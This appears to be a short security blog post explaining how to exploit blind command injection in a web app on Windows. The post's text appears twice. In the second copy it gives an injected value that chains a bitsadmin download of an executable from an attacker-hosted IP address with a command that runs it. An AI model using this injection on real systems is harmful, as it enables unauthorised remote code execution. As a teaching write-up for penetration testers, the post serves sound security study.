I can retrieve files using the same method as.... Windows Update??
In an earlier post, I described one possible way to upgrade a blind, command execution vulnerability to an interactive shell using only native windows commands. In this post I will ultimately accomplish the same goal, just in a different way using the same method that windows update uses to pull files, a tool called bitsadmin.
This is not a new idea, as it has been documented elsewhere (I think @mubix and @carnal0wnage might have mentioned it at Derbycon), but it just sparked my interest after I saw a tweet from @brutelogic, so I wanted to do a quick write up on it.
We will use the same scenario as the previous post, a vulnerable web application where we have confirmed command injection (via ping/DNS etc) but are unable to view our command output.
Once we have generated/selected the executable to be downloaded, we will need to serve it on our attacking machine.We will inject the command the same way as before:
"booyah" is simply the bitsadmin job name and then we provide the command the location of the file to grab, followed by where to save the file and what to save it as. I use the %homepath% variable to be sure the user we are running as has permissions to write to the folder. We then append the command to execute the file as well.
**note that bitsadmin need a full path when you provide the location to save the file or else it will throw an error.
Once the transfer has completed, our payload executes and...
Booyah.
In an earlier post, I described one possible way to upgrade a blind, command execution vulnerability to an interactive shell using only native windows commands. In this post I will ultimately accomplish the same goal, just in a different way using the same method that windows update uses to pull files, a tool called bitsadmin.
This is not a new idea, as it has been documented elsewhere (I think @mubix and @carnal0wnage might have mentioned it at Derbycon), but it just sparked my interest after I saw a tweet from @brutelogic, so I wanted to do a quick write up on it.
We will use the same scenario as the previous post, a vulnerable web application where we have confirmed command injection (via ping/DNS etc) but are unable to view our command output.
Once we have generated/selected the executable to be downloaded, we will need to serve it on our attacking machine.We will inject the command the same way as before:
127.0.0.1 | cmd.exe /c bitsadmin /transfer booyah http://192.168.2.105/boom.exe c:\%homepath%\boom.exe & c:\%homepath%\boom.exe
"booyah" is simply the bitsadmin job name and then we provide the command the location of the file to grab, followed by where to save the file and what to save it as. I use the %homepath% variable to be sure the user we are running as has permissions to write to the folder. We then append the command to execute the file as well.
**note that bitsadmin need a full path when you provide the location to save the file or else it will throw an error.
Once the transfer has completed, our payload executes and...
Booyah.
No comments:
Post a Comment